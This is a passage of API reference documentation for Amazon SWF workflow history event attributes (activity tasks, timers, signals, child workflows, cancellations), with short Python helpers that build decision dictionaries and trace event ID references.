The name of the task list.
- **taskPriority** *(string) --*
The priority to assign to the scheduled activity task. If set, this overrides any default priority value that was assigned when the activity type was registered.
Valid values are integers that range from Java's ``Integer.MIN_VALUE`` (-2147483648) to ``Integer.MAX_VALUE`` (2147483647). Higher numbers indicate higher priority.
For more information about setting task priority, see `Setting Task Priority <http://docs.aws.amazon.com/amazonswf/latest/developerguide/programming-priority.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision that resulted in the scheduling of this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **heartbeatTimeout** *(string) --*
The maximum time before which the worker processing this task must report progress by calling RecordActivityTaskHeartbeat . If the timeout is exceeded, the activity task is automatically timed out. If the worker subsequently attempts to record a heartbeat or return a result, it is ignored.
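An ``ActivityTaskScheduled`` event is recorded when SWF accepts a ``ScheduleActivityTask`` decision, so the attributes above mirror what the decider supplied in that decision. The sketch below builds such a decision dict for ``respond_decision_task_completed``; the helper name and the default timeout values are illustrative choices, not API defaults:

```python
def schedule_activity_decision(activity_id, name, version, input_data,
                               task_list="default", priority="0",
                               schedule_to_start="600", start_to_close="600",
                               schedule_to_close="1200", heartbeat="NONE"):
    """Build a ScheduleActivityTask decision. If SWF accepts it, the
    acceptance is recorded as an ActivityTaskScheduled event carrying
    these same values in the attributes documented above."""
    return {
        "decisionType": "ScheduleActivityTask",
        "scheduleActivityTaskDecisionAttributes": {
            "activityType": {"name": name, "version": version},
            "activityId": activity_id,
            "input": input_data,
            "taskList": {"name": task_list},
            "taskPriority": priority,
            # Durations are strings of seconds; "NONE" means unlimited.
            "scheduleToStartTimeout": schedule_to_start,
            "startToCloseTimeout": start_to_close,
            "scheduleToCloseTimeout": schedule_to_close,
            "heartbeatTimeout": heartbeat,
        },
    }
```

A decider would pass a list of such dicts as the ``decisions`` parameter of ``respond_decision_task_completed``.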
- **activityTaskStartedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **identity** *(string) --*
Identity of the worker that was assigned this task. This aids diagnostics when problems arise. The form of this identity is user defined.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskCompletedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **result** *(string) --*
The results of the activity task.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskFailedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **reason** *(string) --*
The reason provided for the failure.
- **details** *(string) --*
The details of the failure.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskTimedOutEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timeoutType** *(string) --*
The type of the timeout that caused this event.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **details** *(string) --*
Contains the content of the ``details`` parameter for the last call made by the activity to ``RecordActivityTaskHeartbeat`` .
- **activityTaskCanceledEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **details** *(string) --*
Details of the cancellation.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **latestCancelRequestedEventId** *(integer) --*
If set, contains the ID of the last ``ActivityTaskCancelRequested`` event recorded for this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
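Each of the activity closure events above (``ActivityTaskCompleted``, ``ActivityTaskFailed``, ``ActivityTaskTimedOut``, ``ActivityTaskCanceled``) carries ``scheduledEventId`` and ``startedEventId`` back-references. A decider can follow them to recover which activity a closure event belongs to; a minimal sketch, using an abbreviated, hypothetical history (helper name and values are ours):

```python
def originating_activity_id(history, closure_event):
    """Follow scheduledEventId from an activity closure event back to the
    ActivityTaskScheduled event that created the task, and return its
    activityId."""
    # The single populated *EventAttributes member holds the back-references.
    attrs = next(v for k, v in closure_event.items()
                 if k.endswith("EventAttributes"))
    scheduled = next(e for e in history
                     if e["eventId"] == attrs["scheduledEventId"])
    return scheduled["activityTaskScheduledEventAttributes"]["activityId"]

# Abbreviated history shaped like the fields documented above:
history = [
    {"eventId": 5, "eventType": "ActivityTaskScheduled",
     "activityTaskScheduledEventAttributes": {
         "activityId": "resize-42",
         "activityType": {"name": "ResizeImage", "version": "1.0"}}},
    {"eventId": 7, "eventType": "ActivityTaskStarted",
     "activityTaskStartedEventAttributes": {"scheduledEventId": 5}},
    {"eventId": 9, "eventType": "ActivityTaskFailed",
     "activityTaskFailedEventAttributes": {"reason": "transient-error",
                                           "scheduledEventId": 5,
                                           "startedEventId": 7}},
]
```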
- **activityTaskCancelRequestedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskCancelRequested`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelActivityTask`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityId** *(string) --*
The unique ID of the task.
- **workflowExecutionSignaledEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionSignaled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **signalName** *(string) --*
The name of the signal received. The decider can use the signal name and inputs to determine how to process the signal.
- **input** *(string) --*
The inputs provided with the signal. The decider can use the signal name and inputs to determine how to process the signal.
- **externalWorkflowExecution** *(dict) --*
The workflow execution that sent the signal. This is set only if the signal was sent by another workflow execution.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **externalInitiatedEventId** *(integer) --*
The ID of the ``SignalExternalWorkflowExecutionInitiated`` event corresponding to the ``SignalExternalWorkflow`` decision to signal this workflow execution. The source event with this ID can be found in the history of the source workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event. This field is set only if the signal was initiated by another workflow execution.
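In a typical decider loop, ``WorkflowExecutionSignaled`` events are collected from the history page and dispatched by signal name. A small illustrative helper (the function name and sample events are ours):

```python
def pending_signals(events):
    """Extract (signalName, input) pairs from WorkflowExecutionSignaled
    events so the decider can act on each signal by name."""
    return [(attrs["signalName"], attrs.get("input"))
            for event in events
            if event["eventType"] == "WorkflowExecutionSignaled"
            for attrs in [event["workflowExecutionSignaledEventAttributes"]]]

# Hypothetical slice of a history page:
events = [
    {"eventType": "WorkflowExecutionStarted"},
    {"eventType": "WorkflowExecutionSignaled",
     "workflowExecutionSignaledEventAttributes": {
         "signalName": "pause", "input": '{"reason": "maintenance"}'}},
]
```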
- **markerRecordedEventAttributes** *(dict) --*
If the event is of type ``MarkerRecorded`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **markerName** *(string) --*
The name of the marker.
- **details** *(string) --*
The details of the marker.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RecordMarker`` decision that requested this marker. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **recordMarkerFailedEventAttributes** *(dict) --*
If the event is of type ``RecordMarkerFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **markerName** *(string) --*
The marker's name.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RecordMarker`` decision that failed for this marker. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **timerStartedEventAttributes** *(dict) --*
If the event is of type ``TimerStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The unique ID of the timer that was started.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent workflow tasks.
- **startToFireTimeout** *(string) --*
The duration of time after which the timer fires.
The duration is specified in seconds, an integer greater than or equal to ``0`` .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartTimer`` decision for this timer. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **timerFiredEventAttributes** *(dict) --*
If the event is of type ``TimerFired`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The unique ID of the timer that fired.
- **startedEventId** *(integer) --*
The ID of the ``TimerStarted`` event that was recorded when this timer was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **timerCanceledEventAttributes** *(dict) --*
If the event is of type ``TimerCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The unique ID of the timer that was canceled.
- **startedEventId** *(integer) --*
The ID of the ``TimerStarted`` event that was recorded when this timer was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelTimer`` decision to cancel this timer. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
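``TimerFired`` and ``TimerCanceled`` both reference the originating ``TimerStarted`` event through ``startedEventId``, so a decider can classify a timer's state by matching those IDs. A minimal sketch under that reading (the helper name and sample history are ours):

```python
def timer_state(history, timer_id):
    """Classify a timer as 'fired', 'canceled', or 'running' by matching
    the startedEventId back-references documented above. Returns None if
    no TimerStarted event for timer_id is in this history window."""
    started = next((e for e in history
                    if e["eventType"] == "TimerStarted"
                    and e["timerStartedEventAttributes"]["timerId"] == timer_id),
                   None)
    if started is None:
        return None
    for event in history:
        if (event["eventType"] == "TimerFired"
                and event["timerFiredEventAttributes"]["startedEventId"]
                == started["eventId"]):
            return "fired"
        if (event["eventType"] == "TimerCanceled"
                and event["timerCanceledEventAttributes"]["startedEventId"]
                == started["eventId"]):
            return "canceled"
    return "running"

# Hypothetical history: one timer started and later fired.
history = [
    {"eventId": 3, "eventType": "TimerStarted",
     "timerStartedEventAttributes": {"timerId": "retry-backoff",
                                     "startToFireTimeout": "30"}},
    {"eventId": 8, "eventType": "TimerFired",
     "timerFiredEventAttributes": {"timerId": "retry-backoff",
                                   "startedEventId": 3}},
]
```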
- **startChildWorkflowExecutionInitiatedEventAttributes** *(dict) --*
If the event is of type ``StartChildWorkflowExecutionInitiated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the child workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent decision tasks. This data isn't sent to the activity.
- **input** *(string) --*
The inputs provided to the child workflow execution.
- **executionStartToCloseTimeout** *(string) --*
The maximum duration for the child workflow execution. If the workflow execution isn't closed within this duration, it is timed out and force-terminated.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **taskList** *(dict) --*
The name of the task list used for the decision tasks of the child workflow execution.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority assigned for the decision tasks for this workflow execution. Valid values are integers that range from Java's ``Integer.MIN_VALUE`` (-2147483648) to ``Integer.MAX_VALUE`` (2147483647). Higher numbers indicate higher priority.
For more information about setting task priority, see `Setting Task Priority <http://docs.aws.amazon.com/amazonswf/latest/developerguide/programming-priority.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartChildWorkflowExecution`` Decision to request this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childPolicy** *(string) --*
The policy to use for the child workflow executions if this execution gets terminated by explicitly calling the TerminateWorkflowExecution action or due to an expired timeout.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **taskStartToCloseTimeout** *(string) --*
The maximum duration allowed for the decision tasks for this workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **tagList** *(list) --*
The list of tags to associate with the child workflow execution.
- *(string) --*
- **lambdaRole** *(string) --*
The IAM role to attach to the child workflow execution.
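A ``StartChildWorkflowExecutionInitiated`` event echoes the attributes the decider supplied in a ``StartChildWorkflowExecution`` decision, including the child policy values listed above. A sketch of building such a decision (helper name and default values are illustrative, not API defaults):

```python
def start_child_workflow_decision(workflow_id, name, version, input_data,
                                  child_policy="TERMINATE",
                                  task_list="default",
                                  execution_timeout="3600",
                                  task_timeout="60"):
    """Build a StartChildWorkflowExecution decision. Its acceptance is
    recorded as a StartChildWorkflowExecutionInitiated event carrying
    the fields documented above."""
    assert child_policy in ("TERMINATE", "REQUEST_CANCEL", "ABANDON")
    return {
        "decisionType": "StartChildWorkflowExecution",
        "startChildWorkflowExecutionDecisionAttributes": {
            "workflowId": workflow_id,
            "workflowType": {"name": name, "version": version},
            "input": input_data,
            "childPolicy": child_policy,
            "taskList": {"name": task_list},
            # Durations are strings of seconds; "NONE" means unlimited.
            "executionStartToCloseTimeout": execution_timeout,
            "taskStartToCloseTimeout": task_timeout,
        },
    }
```

As above, the decision dict goes in the ``decisions`` list passed to ``respond_decision_task_completed``.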
- **childWorkflowExecutionStartedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was started.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionCompletedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was completed.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **result** *(string) --*
The result of the child workflow execution.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that failed.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **reason** *(string) --*
The reason for the failure (if provided).
- **details** *(string) --*
The details of the failure (if provided).
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionTimedOutEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that timed out.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **timeoutType** *(string) --*
The type of the timeout that caused the child workflow execution to time out.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionCanceledEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was canceled.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **details** *(string) --*
Details of the cancellation (if provided).
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionTerminatedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionTerminated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was terminated.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **signalExternalWorkflowExecutionInitiatedEventAttributes** *(dict) --*
If the event is of type ``SignalExternalWorkflowExecutionInitiated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow execution.
- **runId** *(string) --*
The ``runId`` of the external workflow execution to send the signal to.
- **signalName** *(string) --*
The name of the signal.
- **input** *(string) --*
The input provided to the signal.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``SignalExternalWorkflowExecution`` decision for this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent decision tasks.
- **externalWorkflowExecutionSignaledEventAttributes** *(dict) --*
If the event is of type ``ExternalWorkflowExecutionSignaled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The external workflow execution that the signal was delivered to.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **initiatedEventId** *(integer) --*
The ID of the ``SignalExternalWorkflowExecutionInitiated`` event corresponding to the ``SignalExternalWorkflowExecution`` decision to request this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **signalExternalWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``SignalExternalWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow execution that the signal was being delivered to.
- **runId** *(string) --*
The ``runId`` of the external workflow execution that the signal was being delivered to.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **initiatedEventId** *(integer) --*
The ID of the ``SignalExternalWorkflowExecutionInitiated`` event corresponding to the ``SignalExternalWorkflowExecution`` decision to request this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``SignalExternalWorkflowExecution`` decision for this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
The data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the workflow execution.
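The ``SignalExternalWorkflowExecutionInitiated`` attributes above correspond to a ``SignalExternalWorkflowExecution`` decision made by the decider. A sketch of building that decision (helper name is illustrative; ``runId`` and ``control`` are optional, matching the fields above):

```python
def signal_external_decision(workflow_id, signal_name, input_data,
                             run_id=None, control=None):
    """Build a SignalExternalWorkflowExecution decision. Its acceptance is
    recorded as a SignalExternalWorkflowExecutionInitiated event with the
    attributes documented above."""
    attrs = {
        "workflowId": workflow_id,
        "signalName": signal_name,
        "input": input_data,
    }
    # runId and control are optional; include them only when provided.
    if run_id is not None:
        attrs["runId"] = run_id
    if control is not None:
        attrs["control"] = control
    return {
        "decisionType": "SignalExternalWorkflowExecution",
        "signalExternalWorkflowExecutionDecisionAttributes": attrs,
    }
```

If the target execution cannot be signaled, a ``SignalExternalWorkflowExecutionFailed`` event with a ``cause`` value is recorded instead, as described above.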
- **externalWorkflowExecutionCancelRequestedEventAttributes** *(dict) --*
If the event is of type ``ExternalWorkflowExecutionCancelRequested`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The external workflow execution to which the cancellation request was delivered.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **initiatedEventId** *(integer) --*
The ID of the ``RequestCancelExternalWorkflowExecutionInitiated`` event corresponding to the ``RequestCancelExternalWorkflowExecution`` decision to cancel this external workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **requestCancelExternalWorkflowExecutionInitiatedEventAttributes** *(dict) --*
If the event is of type ``RequestCancelExternalWorkflowExecutionInitiated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow execution to be canceled.
- **runId** *(string) --*
The ``runId`` of the external workflow execution to be canceled.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelExternalWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent workflow tasks.
- **requestCancelExternalWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``RequestCancelExternalWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow to which the cancel request was to be delivered.
- **runId** *(string) --*
The ``runId`` of the external workflow execution.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **initiatedEventId** *(integer) --*
The ID of the ``RequestCancelExternalWorkflowExecutionInitiated`` event corresponding to the ``RequestCancelExternalWorkflowExecution`` decision to cancel this external workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelExternalWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
The data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the workflow execution.
- **scheduleActivityTaskFailedEventAttributes** *(dict) --*
If the event is of type ``ScheduleActivityTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **activityType** *(dict) --*
The activity type provided in the ``ScheduleActivityTask`` decision that failed.
- **name** *(string) --*
The name of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **version** *(string) --*
The version of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **activityId** *(string) --*
The activityId provided in the ``ScheduleActivityTask`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision that resulted in the scheduling of this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **requestCancelActivityTaskFailedEventAttributes** *(dict) --*
If the event is of type ``RequestCancelActivityTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **activityId** *(string) --*
The activityId provided in the ``RequestCancelActivityTask`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelActivityTask`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startTimerFailedEventAttributes** *(dict) --*
If the event is of type ``StartTimerFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The timerId provided in the ``StartTimer`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
